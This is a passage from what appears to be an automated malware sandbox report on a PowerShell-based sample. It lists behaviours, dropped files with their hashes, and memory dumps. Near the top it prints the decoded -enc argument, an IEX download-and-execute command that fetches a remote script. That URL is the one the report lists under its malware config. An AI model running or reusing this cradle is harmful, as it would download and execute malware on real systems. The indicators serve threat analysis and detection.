        (the -enc argument is UTF-16LE base64 for: IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1"), the URL listed under Malware Config)
        - Blocklisted process makes network request
        - Drops file in Program Files directory
        - Drops file in Windows directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
Downloads
C:\Users\Admin\AppData\Local\Temp\2o5ylb4h\2o5ylb4h.dll
  Filesize: 3KB
  MD5:    d26a52fdd0d406f91aad441900651e14
  SHA1:   ae0747804ce277ed45b3e5bbdbe918b3f45c23f0
  SHA256: 08cc742d6cce43274fd3cc3b4dc7210fc9636624400a984a2fb79205451c8aa6
  SHA512: af25ddc44217b32782680123927aba21accf761285812d5c6ff23d4f42fc6bbc3f1d07a47a900afaaf5763dea1208ee26850e4526272a5237aceffa5e4c42e0f
C:\Users\Admin\AppData\Local\Temp\RESEDDF.tmp
  Filesize: 1KB
  MD5:    5bbe07c9b2e799c41cb6b6b515ca8073
  SHA1:   38e4db880905ca9d9fef243ea7d4d274110aef7d
  SHA256: 313ab97945563ad3048ca11de1011301f4ed3c20677462ed3153be800b416299
  SHA512: 68750f3f95eca71e274113209911de7a5f29c2a021b527cbb40366b0ac28bda38a79ac93d6b2263db909ff4289f66ee7ce06eba0eaea49fb47e1bc5b12624929
C:\Users\Admin\AppData\Local\Temp\get-points.ps1
  Filesize: 3.0MB
  MD5:    bcac3bbb18f093dbc8e5e76d2675695f
  SHA1:   96453f65b41e428937349e6f48fe67d6dfd6a580
  SHA256: b25768626991b9a33e3ada79e3beb92fa5d83e1b50f2820e6fa2d6cf4827b21a
  SHA512: 78c55502c7d0484b458fadb78bc075b8eda01b794e2037283df11dc58105bd632c0e747e92fd7aac7b79c5ac0ddce9bb2c6e7ce158c743c9f080a52eda0498ab
C:\Users\Admin\AppData\Local\Temp\get-points.zip
  Filesize: 2.3MB
  MD5:    42c2a160d2d191e6ffcc1076b4734ee2
  SHA1:   c8a71ddb77c6bad039fbb041bbf7ea2021ca9d49
  SHA256: 2b8aebe68161f07e7029bac05eeeb009455553731baf60b447d0d4aaa9fded99
  SHA512: 3b9de3ad6cbe4db3958564b4bd37a45e6aa3a62a4a6e6756d6e997a9cc9c2dca31053e9e0aa300c1660b72332eb1f677f6b65762825ac68a99a55d06043e0939
C:\Windows\Branding\mediasrv.png
  Filesize: 55KB
  MD5:    f357d4e7b83bc0a41c65d97f3e6f50f4
  SHA1:   71db3180a8ada6d5d7722c54a5940c3490f78636
  SHA256: db0b525a0871cd413d9e1e4a31568b10344aa996823a22e85179ea4dab11afba
  SHA512: 566bc45578f2754b4330fc2721d24aef95ae25ef258d56b00c8cb585061f89386a5d27245d301ea0d479797a42f0487605c294008a6d33559634b5e35f4b4e8e
C:\Windows\Branding\mediasvc.png
  Filesize: 944KB
  MD5:    d5de6f599d9807bac2f5a8e751a8c38f
  SHA1:   9e70edf56b6a5768fda84232e9c557e750d3631b
  SHA256: 18207938b456352ad540ed62fb113b7b11025a6d2b1de08728772c24c8553fca
  SHA512: e526e3a75be31762bb5fc01f4450ff48391fe36a1e71aef6a89d3f262e523e2f7654501f43667a3e982a05835418e72ae26ec3ba955b8537a700e69e82337fc5
C:\Windows\system32\rfxvmt.dll
  Filesize: 40KB
  MD5:    dc39d23e4c0e681fad7a3e1342a2843c
  SHA1:   58fd7d50c2dca464a128f5e0435d6f0515e62073
  SHA256: 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
  SHA512: 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
\??\c:\Users\Admin\AppData\Local\Temp\2o5ylb4h\2o5ylb4h.0.cs
  Filesize: 507B
  MD5:    6f235215132cdebacd0f793fe970d0e3
  SHA1:   2841e44c387ed3b6f293611992f1508fe9b55b89
  SHA256: ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
  SHA512: a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
\??\c:\Users\Admin\AppData\Local\Temp\2o5ylb4h\2o5ylb4h.cmdline
  Filesize: 369B
  MD5:    8f1bbafbfab3cd4ffc56e35a9e4d0dcf
  SHA1:   1ae4efebf775275c207567c1026e771a2910788a
  SHA256: c0f601ff829001efbc50c911eef95947d7e20eefb5fe36a09beca03625981c2a
  SHA512: b1d802f777fcd9a3ec8343eca038ed1ee2cf76261262edbdd460d3de9d7ef73a61ebcd9151fc81900e0873153e3548ca437556ade3b3fa04af237a7add6cc43d
\??\c:\Users\Admin\AppData\Local\Temp\2o5ylb4h\CSC9AEA88AD1398439A97F918B61E789921.TMP
  Filesize: 652B
  MD5:    5713fd0890bda27ccdeb3986588563c4
  SHA1:   f85141760d3415da16f3decd58902045ba332f94
  SHA256: 4633d2a2e9fdb49ab242b7f4228986ebc5901a33df5b1929539bda6a59879a75
  SHA512: 9626ee201da4854974df2e7af297839390ae22287af3f9ce2bf9a140e299a433d3ba260cdf95a435f29caacc78f9dd43e654676ab88fedd074cb579bc872874d

Memory dumps (mapping dumps carry no size; region dumps list their size)
memory/220-159-0x0000000000000000-mapping.dmp
memory/404-152-0x0000000000000000-mapping.dmp
memory/540-177-0x0000000000000000-mapping.dmp
memory/952-175-0x0000000000000000-mapping.dmp
memory/1084-181-0x0000000000000000-mapping.dmp
memory/1088-165-0x0000000000000000-mapping.dmp
memory/1108-140-0x0000000000000000-mapping.dmp
memory/1132-182-0x0000000000000000-mapping.dmp
memory/1452-186-0x0000000000000000-mapping.dmp
memory/1648-154-0x0000000000000000-mapping.dmp
memory/1756-134-0x000002482C330000-0x000002482C352000-memory.dmp (136KB)
memory/1756-133-0x0000000000000000-mapping.dmp
memory/1756-137-0x000002482C510000-0x000002482C512000-memory.dmp (8KB)
memory/1756-139-0x000002482C516000-0x000002482C518000-memory.dmp (8KB)
memory/1756-138-0x000002482C513000-0x000002482C515000-memory.dmp (8KB)
memory/1756-136-0x00007FFDDBD90000-0x00007FFDDC851000-memory.dmp (10.8MB)
memory/1976-155-0x0000000000000000-mapping.dmp
memory/2132-188-0x0000000000000000-mapping.dmp
memory/2156-164-0x0000000000000000-mapping.dmp
memory/2200-147-0x0000000000000000-mapping.dmp
memory/2240-187-0x0000000000000000-mapping.dmp
memory/2332-162-0x0000000000000000-mapping.dmp
memory/2340-183-0x0000000000000000-mapping.dmp
memory/2448-184-0x0000000000000000-mapping.dmp
memory/2940-158-0x0000000000000000-mapping.dmp
memory/2964-167-0x0000000000000000-mapping.dmp
memory/3156-163-0x0000000000000000-mapping.dmp
memory/3348-168-0x0000000000000000-mapping.dmp
memory/3352-173-0x0000000000000000-mapping.dmp
memory/3412-172-0x0000000000000000-mapping.dmp
memory/3500-150-0x0000000000000000-mapping.dmp
memory/3512-151-0x0000000000000000-mapping.dmp
memory/3712-143-0x0000000000000000-mapping.dmp
memory/3860-149-0x0000000000000000-mapping.dmp
memory/3964-178-0x0000000000000000-mapping.dmp
memory/3984-179-0x0000000000000000-mapping.dmp
memory/4028-166-0x0000000000000000-mapping.dmp
memory/4068-174-0x0000000000000000-mapping.dmp
memory/4120-160-0x0000000000000000-mapping.dmp
memory/4232-156-0x0000000000000000-mapping.dmp
memory/4324-180-0x0000000000000000-mapping.dmp
memory/4368-189-0x0000000000000000-mapping.dmp
memory/4368-193-0x0000019A42FC6000-0x0000019A42FC8000-memory.dmp (8KB)
memory/4368-192-0x0000019A42FC3000-0x0000019A42FC5000-memory.dmp (8KB)
memory/4368-191-0x0000019A42FC0000-0x0000019A42FC2000-memory.dmp (8KB)
memory/4368-190-0x00007FFDDBB50000-0x00007FFDDC611000-memory.dmp (10.8MB)
memory/4600-157-0x0000000000000000-mapping.dmp
memory/4860-185-0x0000000000000000-mapping.dmp
memory/4984-131-0x0000000000040000-0x00000000004F8000-memory.dmp (4.7MB)
memory/4984-132-0x00000000029F0000-0x0000000002E9C000-memory.dmp (4.7MB)
memory/4984-130-0x00000000026AC000-0x00000000029E9000-memory.dmp (3.2MB)
memory/5004-153-0x0000000000000000-mapping.dmp
memory/5064-176-0x0000000000000000-mapping.dmp
memory/5096-161-0x0000000000000000-mapping.dmp